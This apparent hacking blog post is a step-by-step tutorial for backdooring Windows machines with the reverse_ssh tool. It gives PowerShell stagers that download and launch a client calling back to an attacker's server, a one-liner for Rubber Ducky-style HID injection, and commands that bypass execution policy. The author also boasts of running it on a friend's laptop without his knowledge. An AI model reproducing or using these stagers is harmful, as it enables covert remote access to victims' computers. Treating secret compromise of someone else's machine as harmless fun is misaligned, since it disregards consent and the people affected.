Hack Windows Machines without any Restriction
Hey guys, Smukx here, hope you are all doing well. Today I am going to share a technique for planting a backdoor on a Windows machine using reverse SSH. Yes, using SSH (Secure Shell).
Disclaimer: This blog is intended for awareness and educational purposes only. I am not responsible for what you do with it.
So boot up a Linux machine and download the two files (the server and the client) created by NHAS. I recommend using Linux for the attacking side.

Download the files from the project's Releases page (github.com/NHAS/reverse_ssh/releases).

Generate an RSA key pair for logging in to the server with `ssh-keygen -t rsa`. The server looks for a file named `authorized_keys` next to it that holds the public keys allowed to log in, so copy the public half of the pair (the `.pub` file) into a file with exactly that name. The private key stays on your machine; it is what your `ssh` client will present when you connect. Note: the file must be named `authorized_keys`, nothing else.

Start the server with `./server 0.0.0.0:1234 --insecure`. The `--insecure` flag tells the server to accept any client without checking its key. That is convenient in a lab, but on an internet-facing server it means anyone who finds the port can attach a client to your server.
To connect to the server, ssh to it as you normally would, for example `ssh -p 1234 <your server ip>`, with the key you just generated. Once connected, the `help` command lists the features available.
On the client (victim) side, download `client.exe` from the Releases page, open PowerShell and run `./client.exe -d <your server ip>:<port>`. For example, `./client.exe -d 10.10.10.10:1234` connects back to the server started above.
If you are pentesting together with team mates, have each of them generate their own SSH key pair and append their public key to the `authorized_keys` file, one key per line.
For automation, I wrote a PowerShell script that downloads the client and runs it.
```powershell
# Pinned release of the reverse_ssh client
$DownloadUrl  = "https://github.com/NHAS/reverse_ssh/releases/download/v2.1.3/client.exe"
$DownloadPath = "$env:TEMP\client.exe"
# Replace the IP and port with your server's. Only the arguments go here:
# Start-Process already supplies the executable through -FilePath, so
# putting "client.exe" in the argument list would pass it as a stray argument.
$Command = "-d 10.10.10.10:1234"
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile($DownloadUrl, $DownloadPath)
Start-Process -FilePath $DownloadPath -ArgumentList $Command
```
The script above downloads client.exe to %TEMP%, launches it with your server address, and exits. If you save it as a .ps1 file, the execution policy must allow scripts to run: either open PowerShell as administrator and run `Set-ExecutionPolicy Unrestricted`, or, without admin rights, start it with `powershell -ExecutionPolicy Bypass -File <script>.ps1`, which only affects that one process. Press Enter and done.
Tested on one of my friends' laptops (Windows 11). He didn't know what I was doing! So no worries ;)
I also tested it on a Windows 10 machine. When I executed the command-line version of the script in one of my VMs, I got a connection.
From the server console you can connect to the victim machine either by its IP address or by the ID the server assigned it when it checked in. The console also supports tab completion.
One advantage of reverse SSH over other payloads is the stability of the connection. It is not a shell dressed up to look like a console; it is a real SSH session, so you get a proper terminal with the responsiveness of normal SSH, and the client is portable. And because the client keeps trying to reach the server, you can disconnect and pick the session up again later.
For HID attacks such as Rubber Ducky and Arduino payloads, and to avoid the execution-policy and admin requirements, use the version below that I collapsed into a single command line. The execution policy only governs script files, so a one-liner typed at the prompt or passed to `powershell -Command` runs without changing it.
```powershell
$DownloadUrl = "https://github.com/NHAS/reverse_ssh/releases/download/v2.1.3/client.exe";$DownloadPath = "$env:TEMP\client.exe";$Command = "-d 192.168.1.103:1234";$WebClient = New-Object System.Net.WebClient;$WebClient.DownloadFile($DownloadUrl, $DownloadPath);Start-Process -FilePath $DownloadPath -ArgumentList $Command
```
No admin rights are required to run this command: it only writes to the current user's %TEMP% and starts a process as that user.
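As an added example (my own, not code from the original post or from the reverse_ssh project), here is the same stager written as a function that pins the release version, checks the SHA-256 of the downloaded client against a hash you recorded from a copy you trust before the engagement, and passes the arguments to `Start-Process` correctly. The `$ExpectedSha256` value and the server address are placeholders you must fill in; the function name `Invoke-ReverseSshStager` and the `stager.ps1` file name are mine.

```powershell
# Added example: a stager with an integrity check on the downloaded client.
# Not from the original post or the reverse_ssh project.
# $ExpectedSha256 is a placeholder: compute Get-FileHash on a client.exe you
# have vetted and paste the value in before using this.
function Invoke-ReverseSshStager {
    param(
        [Parameter(Mandatory)] [string] $Server,          # e.g. 10.10.10.10:1234
        [string] $Version = "v2.1.3",
        [string] $ExpectedSha256 = "PASTE-SHA256-OF-client.exe-HERE",
        [string] $DownloadPath = (Join-Path $env:TEMP "client.exe")
    )

    $url = "https://github.com/NHAS/reverse_ssh/releases/download/$Version/client.exe"

    # Older Windows 10 builds default to TLS 1.0/1.1, which GitHub rejects.
    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

    Invoke-WebRequest -Uri $url -OutFile $DownloadPath -UseBasicParsing

    # Refuse to run a binary that is not the one you vetted: a replaced
    # release asset or a tampered download would otherwise run as the user.
    $actual = (Get-FileHash -Path $DownloadPath -Algorithm SHA256).Hash
    if ($actual -ne $ExpectedSha256.ToUpperInvariant()) {
        Remove-Item -Path $DownloadPath -Force
        throw "client.exe hash mismatch: expected $ExpectedSha256, got $actual"
    }

    # -ArgumentList carries only the arguments; the executable comes from -FilePath.
    $proc = Start-Process -FilePath $DownloadPath -ArgumentList @("-d", $Server) -PassThru
    return $proc.Id
}

# Save this as stager.ps1 with a call appended, for example:
#   Invoke-ReverseSshStager -Server 10.10.10.10:1234 -ExpectedSha256 <hash>
# then run it from a normal (non-admin) prompt without touching the machine-wide policy:
#   powershell -NoProfile -ExecutionPolicy Bypass -File .\stager.ps1
```

The function returns the PID of the launched client so you can stop it at the end of the engagement; remember that the binary itself stays in %TEMP% until you delete it.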
For more PowerShell scripts, visit my repository, where I explain PowerShell tools and techniques: how to use advanced commands, payloads, and advanced PowerShell for people with an IT background.
See Ps-script-for-Hackers-and-Pentesters for more information.
That's it guys, thanks for reading. If you found this useful, leave a clap.
Follow me on GitHub and Medium.
PowerShell repository: Link
My stories: Click Here
Bye bye...
Happy hacking :)